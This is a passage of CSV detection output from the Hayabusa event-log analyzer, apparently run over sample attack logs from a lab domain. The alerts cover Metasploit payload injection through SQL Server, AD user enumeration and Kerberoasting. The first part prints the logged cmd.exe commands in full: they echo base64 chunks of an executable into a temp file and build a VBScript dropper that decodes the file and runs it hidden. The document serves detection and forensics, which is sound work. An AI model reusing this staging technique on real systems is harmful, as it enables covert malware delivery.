0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQACAAIAAAAOAAIAAgAAAA4APwAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAMYGAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAKIGAAABADAANAAwADkAMAA0AGIAMAAAADAEDAIBAEMAbwBtAG0AZQBuAHQAcwAAAEwAaQBjAGUAbgBzAGUAZAAgAHUAbgBkAGUAcgAgAHQAaABlACAAQQBwAGEAYwBoAGUAIABMAGkAYwBlAG4AcwBlACwAIABWAGUAcgBzAGkAbwBuACAAMgAuADAAIAAoAHQAaABlACAAIgBMAGkAYwBlAG4AcwBlACIAKQA7ACAAeQBvAHUAIABtAGEAeQAgAG4AbwB0ACAAdQBzAGUAIAB0AGgAaQBzACAAZgBpAGwAZQAgAGUAeABjAGUAcAB0ACAAaQBuACAAYwBvAG0AcABsAGkAYQBuAGMAZQAgAHcAaQB0AGgAIAB0AGgAZQAgAEwAaQBjAGUAbgBzAGUALgAgAFkAbwB1ACAAbQBhAHkAIABvAGIAdABhAGkAbgAgAGEAIABjAG8AcAB5ACAAbwBmACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAYQB0AA0ACgANAAoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAcABhAGMAaABlAC4AbwByAGcALwBsAGkAYwBlAG4AcwBlAHMALwBMAEkAQwBFAE4AUwBFAC0AMgAuADAADQAKAA0ACgBVAG4AbABlAHMAcwAgAHIAZQBxAHUAaQByAGUAZAAgAGIAeQAgAGEAcABwAGwAaQBjAGEAYgBsAGUAIABsAGEAdwAgAG8AcgAgAGEAZwByAGUAZQBkACAAdABvACAAaQBuACAAdwByAGkAdABpAG4AZwAsACAAcwBvAGYAdAB3AGEAcgBlACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAaQBzACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAbwBuACAAYQBuACAAIgBBAFMAIABJAFMAIgAgAEIAQQBTAEkAUwAsACAAVwBJAFQASABPAFUAVAAgAFcAQQBSAFIAQQBOAFQASQBFAFMAIABPAFIAIABDAE8ATgBEAEkAVABJAE8ATgBTACAATwBGACAAQQBOAFkAIABLAEkATgBEACwAIABlAGkAdABoAGUAcgAgAGUAeABwAHIAZQBzAHMAIABvAHIAIABpAG0AcABsAGkAZQBkAC4AIABTAGUAZQAgAHQAaABlACAATABpAGMAZQBuAHMAZQAgAGYAbwByACAAdABoAGUAIABzAHAAZQBjAGkAZgBpAGMAIABsAGEAbgBnAHUAYQBnAGUAIABnAG8AdgBlAHIA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) 
>>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: 
C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = ""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: | Svc: | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,../hayabusa-rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | 
Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: 